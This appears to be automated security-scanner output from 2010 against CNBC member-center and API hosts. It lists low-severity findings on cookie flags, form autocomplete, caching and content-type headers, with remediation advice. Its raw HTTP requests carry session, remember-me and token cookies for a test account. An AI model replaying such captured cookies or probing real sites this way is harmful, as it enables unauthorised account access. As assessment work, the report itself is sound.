HTTP/1.1 404 Not Found Date: Wed, 22 Dec 2010 14:59:28 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Content-Length: 242 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1153552960.23040.0000; expires=Wed, 22-Dec-2010 17:59:28 GMT; path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /email/images/customer_care_response_F-03.jpg was not ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 404 Not Found Date: Wed, 22 Dec 2010 14:59:28 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Content-Length: 242 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1153552960.23040.0000; expires=Wed, 22-Dec-2010 17:59:28 GMT; path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /email/images/customer_care_response_F-07.jpg was not ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 404 Not Found Date: Tue, 21 Dec 2010 17:40:57 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Content-Length: 209 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; expires=Tue, 21-Dec-2010 20:40:57 GMT; path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /favicon.ico was not found on this server.</p> </body ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
/* Prototype JavaScript framework, version 1.5.0 * (c) 2005-2007 Sam Stephenson * * Prototype is freely distributable under the terms of an MIT-style license. * For details, see the Prototype ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
//Field Validations - start var goOptions = true; var goAddrs1 = true; var goAddrs2 = true; var goPhone = true; var goHhi = true; var goIndustry = true; var goStDsc = true; var goCity = true; ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
function toggleMessage(show, hide1, hide2){ var showObj = document.getElementById(show); var hideObj1 = document.getElementById(hide1); var hideObj2 = document.getElementById(hide2); hideObj1. ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
//Field Validations - start var goEmail = true; var goEmailConf = true; var goPwd = true; var goPwdConf = true; var goSecQstn = true; var goSecAns = true; var goScrnNm = true; var goFrstNm = true; var ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
/* SiteCatalyst code version: H.2. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com */ /* Specify the Report Suite ID(s) to track here FEBRUARY 19 2008 UPDATE NBCU CMJ ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <title>Member Center</title> <link href="/css/member_center_sytles.css" rel="stylesheet" type ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /membercenter/changeemailform.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=698F629D8D09311DADAE187E0DFFC18F; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CMain%252520Menu%2526pidt%253D1%2526oid%253Dhttps%25253A//register.cnbc.com/email/EmailSupport.jsp%2526ot%253DA; AxData=; pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1640092224.20480.0000; s_cc=true; TZM=-360; s_nr=1292954620754; pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <title>Reset Password</title> <link href="/css/member_center_sytles.css" rel="stylesheet" typ ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /membercenter/notificationmanager.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=698F629D8D09311DADAE187E0DFFC18F; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=%5B%5BB%5D%5D; AxData=; pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1640092224.20480.0000; s_cc=true; TZM=-360; s_nr=1292954620754; pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <title>CNBC Member Center: Free CNBC Newsletters</title> <link href="/css/member_center_sytle ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /membercenter/plusmanager.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=698F629D8D09311DADAE187E0DFFC18F; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CMain%252520Menu%2526pidt%253D1%2526oid%253Dhttps%25253A//register.cnbc.com/email/EmailSupport.jsp%2526ot%253DA; AxData=; pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1640092224.20480.0000; s_cc=true; TZM=-360; s_nr=1292954620754; pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html lang="en"> <head> <title>CNBC Member Center: Account Information</title> <link href="/css/me ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /membercenter/promanager.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=698F629D8D09311DADAE187E0DFFC18F; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CMain%252520Menu%2526pidt%253D1%2526oid%253Dhttps%25253A//register.cnbc.com/email/EmailSupport.jsp%2526ot%253DA; AxData=; pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1640092224.20480.0000; s_cc=true; TZM=-360; s_nr=1292954620754; pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <title>CNBC Pro subscription manager</title> <link href="/css/member_center_sytles.css" rel=" ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /membercenter/updatePassword.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=698F629D8D09311DADAE187E0DFFC18F; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CMain%252520Menu%2526pidt%253D1%2526oid%253Dhttps%25253A//register.cnbc.com/email/EmailSupport.jsp%2526ot%253DA; AxData=; pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1640092224.20480.0000; s_cc=true; TZM=-360; s_nr=1292954620754; pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <title>Update Password</title> <link href="/css/member_center_sytles.css" rel="stylesheet" ty ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /membercenter/updateUser.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=698F629D8D09311DADAE187E0DFFC18F; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=%5B%5BB%5D%5D; AxData=; pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1640092224.20480.0000; s_cc=true; TZM=-360; s_nr=1292954620754; pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html lang="en"> <head> <title>CNBC Member Center: Account Information</title> <link href="/css/me ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /membercenter/viewalert.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=698F629D8D09311DADAE187E0DFFC18F; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CMain%252520Menu%2526pidt%253D1%2526oid%253Dhttps%25253A//register.cnbc.com/email/EmailSupport.jsp%2526ot%253DA; AxData=; pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1640092224.20480.0000; s_cc=true; TZM=-360; s_nr=1292954620754; pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <title>CNBC Member Center: Breaking News Alerts</title> <link href="/css/member_center_sytles ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /quote-html-webservice/fvquote.htm HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=698F629D8D09311DADAE187E0DFFC18F; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=%5B%5BB%5D%5D; AxData=; pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1640092224.20480.0000; s_cc=true; TZM=-360; s_nr=1292954620754; pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
Response
HTTP/1.1 404 Not Found Date: Tue, 21 Dec 2010 20:32:53 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Content-Length: 231 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; expires=Tue, 21-Dec-2010 23:32:54 GMT; path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /quote-html-webservice/fvquote.htm was not found on t ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /quote-html-webservice/quote.htm HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=698F629D8D09311DADAE187E0DFFC18F; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=%5B%5BB%5D%5D; AxData=; pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1640092224.20480.0000; s_cc=true; TZM=-360; s_nr=1292954620754; pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
Response
HTTP/1.1 404 Not Found Date: Tue, 21 Dec 2010 20:32:53 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Content-Length: 229 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; expires=Tue, 21-Dec-2010 23:32:54 GMT; path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /quote-html-webservice/quote.htm was not found on thi ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.
Issue remediation
The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:
The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:
Content-Type: text/html
Issue background
If a web response specifies multiple incompatible content types, then the browser will usually analyse the response and attempt to determine the actual MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of multiple incompatible content type statements does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 21 Dec 2010 17:41:06 GMT Content-Type: text/html Connection: keep-alive Cache-Control: private Content-Length: 2521 Expires: Tue, 21 Dec 2010 17:01:06 GMT IISExport: This web site was exported using IIS Export v4.2 X-Powered-By: ASP.NET P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND" Set-Cookie: 1602%5F0=7A61B4E490B96BC2E4CB71A1868D6F96; path=/ Set-Cookie: 1602%5F1=YYY5%5FXUi%2FFXE152AQWyAmAM%2BdHg%3D%3D; expires=Thu, 29-Aug-2024 16:41:06 GMT; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
GET /api/chart/chart.asp HTTP/1.1 Host: api-cdn.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO3=unkz; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=%5B%5BB%5D%5D; AxData=; s_cc=true; s_nr=1292257245769; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-1082571395-1289590021769; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Content-Type: text/html Cache-Control: private Content-Length: 70 Expires: Tue, 21 Dec 2010 18:37:52 GMT IISExport: This web site was exported using IIS Export v4.2 X-Powered-By: ASP.NET P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND" Vary: Accept-Encoding Date: Tue, 21 Dec 2010 19:17:52 GMT Connection: close
GET /api/chart/chart.asp HTTP/1.1 Host: api.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO3=unkz; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CMain%252520Menu%2526pidt%253D1%2526oid%253Dhttps%25253A//register.cnbc.com/email/EmailSupport.jsp%2526ot%253DA; Axxd=1; AxData=; s_cc=true; s_nr=1292954620754; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
Response
HTTP/1.1 200 OK Date: Tue, 21 Dec 2010 19:17:54 GMT IISExport: This web site was exported using IIS Export v4.2 Connection: close P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND" Content-Length: 70 Content-Type: text/html Expires: Tue, 21 Dec 2010 18:37:54 GMT Cache-control: private
GET /api/movers/movers.asp?chartType=gainers&rowCount=5&link=quote HTTP/1.1 Host: api.cnbc.com Proxy-Connection: keep-alive Referer: http://www.cnbc.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1082571395-1289590021769; s_nr=1292257245769
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 21 Dec 2010 17:39:04 GMT Content-Type: text/html Connection: keep-alive Cache-Control: private Content-Length: 2415 Expires: Tue, 21 Dec 2010 16:59:04 GMT IISExport: This web site was exported using IIS Export v4.2 X-Powered-By: ASP.NET P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"
